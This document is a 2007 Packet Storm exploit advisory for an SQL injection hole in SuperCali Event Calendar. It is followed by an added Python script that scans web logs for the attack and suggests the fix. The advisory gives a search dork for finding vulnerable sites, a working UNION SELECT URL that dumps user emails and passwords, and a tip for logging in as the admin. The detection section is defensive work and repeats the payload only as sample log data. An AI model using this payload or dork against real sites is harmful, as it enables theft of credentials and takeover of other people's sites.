supercali-sql.txt

2007-07-07T00:00:00
ID PACKETSTORM:57487
Type packetstorm
Reporter t0pp8uzz
Modified 2007-07-07T00:00:00

Description

                                        
                                            `--==+================================================================================+==--  
--==+ SuperCali Event Calendar SQL Injection Vulnerability +==--  
--==+================================================================================+==--  
  
  
  
AUTHOR: t0pP8uZz & xprog  
SITE: http://supercali.inforest.com/  
DORK: allintext:"SuperCali Event Calendar"  
  
  
DESCRIPTION:   
Pull out members' info from the database.  
  
  
EXPLOITS:  
http://www.server.com/index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password),4,5,0x677269642E706870/**/from/**/users/*  
  
NOTE/TIP:   
Normally the first result is the admin info. Click the upper-right link labeled 'manage calender'  
to log in as admin.  
  
  
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !  
  
  
`
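
Added example (not part of the original advisory and not SuperCali code): a log check for requests shaped like the one under EXPLOITS, where the `o` parameter carries `/**/` comments in place of spaces, a UNION SELECT and hex literals. It assumes legitimate `o` values are plain non-negative integers and that the web server writes Common/Combined Log Format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

COMMENT = re.compile(r"/\*.*?\*/", re.S)           # closed /* ... */ comment
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
HEX = re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)       # e.g. 0x3a used as a string literal
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Turn comment-as-whitespace tricks back into plain spaces."""
    value = COMMENT.sub(" ", value)
    value = value.split("/*", 1)[0]                # drop an unterminated trailing /*
    return re.sub(r"\s+", " ", value).strip()

def inspect_target(target, param="o"):
    """Return the reasons the `param` value looks like SQL injection ([] = clean)."""
    reasons = []
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for raw in query.get(param, []):
        if re.fullmatch(r"\d+", raw):
            continue                               # assumption: legitimate values are plain integers
        reasons.append("non-numeric value")
        if "/*" in raw:
            reasons.append("inline SQL comment")
        norm = normalize(raw)
        if UNION.search(norm):
            reasons.append("UNION SELECT")
        if HEX.search(norm):
            reasons.append("hex literal")
    return reasons

def scan_log(lines, param="o"):
    """Return (line_number, reasons) for access-log lines with a suspicious `param`."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        reasons = inspect_target(match.group(1), param) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

# Constructed sample log lines (client addresses from the documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Jul/2007:10:00:01 +0000] "GET /index.php?o=3 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [07/Jul/2007:10:00:09 +0000] "GET /index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,'
    'concat(email,0x3a,password),4,5,0x677269642E706870/**/from/**/users/* HTTP/1.1" 200 4870',
    '192.0.2.10 - - [07/Jul/2007:10:00:15 +0000] "GET /index.php?o=1%20UnIoN%20SeLeCt%201 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, reasons in scan_log(SAMPLE_LOG):
        print(number, ", ".join(reasons))
```

Log matching of this kind only surfaces attempts after the fact; the fix on the application side is to validate `o` as an integer and bind it as a query parameter instead of concatenating it into the SQL string.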